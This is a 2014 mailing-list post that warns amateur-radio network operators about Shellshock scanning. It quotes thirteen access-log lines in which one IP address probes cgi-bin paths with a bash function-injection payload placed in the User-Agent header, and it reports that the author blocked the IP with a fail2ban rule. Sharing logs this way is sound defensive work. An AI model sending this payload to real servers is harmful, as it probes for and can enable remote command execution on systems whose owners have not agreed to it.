[Uronode] [44net] Shellshock

sp2lob sp2lob at tlen.pl
Thu Oct 16 05:06:09 CDT 2014


Greetings to everybody.

Shellshock still advancing:

180.186.121.254 - - [15/Oct/2014:13:04:01 +0200] "GET /cgi-bin/load.cgi 
HTTP/1.1" 404 478 "-" "() { :;}; echo `echo xbash:test`"
180.186.121.254 - - [15/Oct/2014:13:04:02 +0200] "GET /cgi-bin/test.cgi 
HTTP/1.1" 404 478 "-" "() { :;}; echo `echo xbash:test`"
180.186.121.254 - - [15/Oct/2014:13:04:03 +0200] "GET /cgi-bin/index.cgi 
HTTP/1.1" 404 479 "-" "() { :;}; echo `echo xbash:test`"
180.186.121.254 - - [15/Oct/2014:13:04:03 +0200] "GET /cgi-bin/help.cgi 
HTTP/1.1" 404 478 "-" "() { :;}; echo `echo xbash:test`"
180.186.121.254 - - [15/Oct/2014:13:04:04 +0200] "GET 
/cgi-bin/vidredirect.cgi HTTP/1.1" 404 485 "-" "() { :;}; echo `echo 
xbash:test`"
180.186.121.254 - - [15/Oct/2014:13:04:04 +0200] "GET /cgi-bin/click.cgi 
HTTP/1.1" 404 479 "-" "() { :;}; echo `echo xbash:test`"
180.186.121.254 - - [15/Oct/2014:13:04:04 +0200] "GET 
/cgi-bin/details.cgi HTTP/1.1" 404 481 "-" "() { :;}; echo `echo 
xbash:test`"
180.186.121.254 - - [15/Oct/2014:13:04:05 +0200] "GET /cgi-bin/log.cgi 
HTTP/1.1" 404 477 "-" "() { :;}; echo `echo xbash:test`"
180.186.121.254 - - [15/Oct/2014:13:04:05 +0200] "GET 
/cgi-bin/viewcontent.cgi HTTP/1.1" 404 485 "-" "() { :;}; echo `echo 
xbash:test`"
180.186.121.254 - - [15/Oct/2014:13:04:06 +0200] "GET 
/cgi-bin/content.cgi HTTP/1.1" 404 481 "-" "() { :;}; echo `echo 
xbash:test`"
180.186.121.254 - - [15/Oct/2014:13:04:07 +0200] "GET /cgi-bin/admin.cgi 
HTTP/1.1" 404 479 "-" "() { :;}; echo `echo xbash:test`"
180.186.121.254 - - [15/Oct/2014:13:04:07 +0200] "GET 
/cgi-bin/userreg.cgi HTTP/1.1" 404 481 "-" "() { :;}; echo `echo 
xbash:test`"
180.186.121.254 - - [15/Oct/2014:13:04:08 +0200] "GET 
/cgi-bin/mailview.cgi HTTP/1.1" 404 482 "-" "() { :;}; echo `echo 
xbash:test`"

Above IP sent 13 variations of "test"
untill I made new fail2ban trap rule.

Keep sharp lookout!

Best regards.
Tom - sp2lob



More information about the Uronode mailing list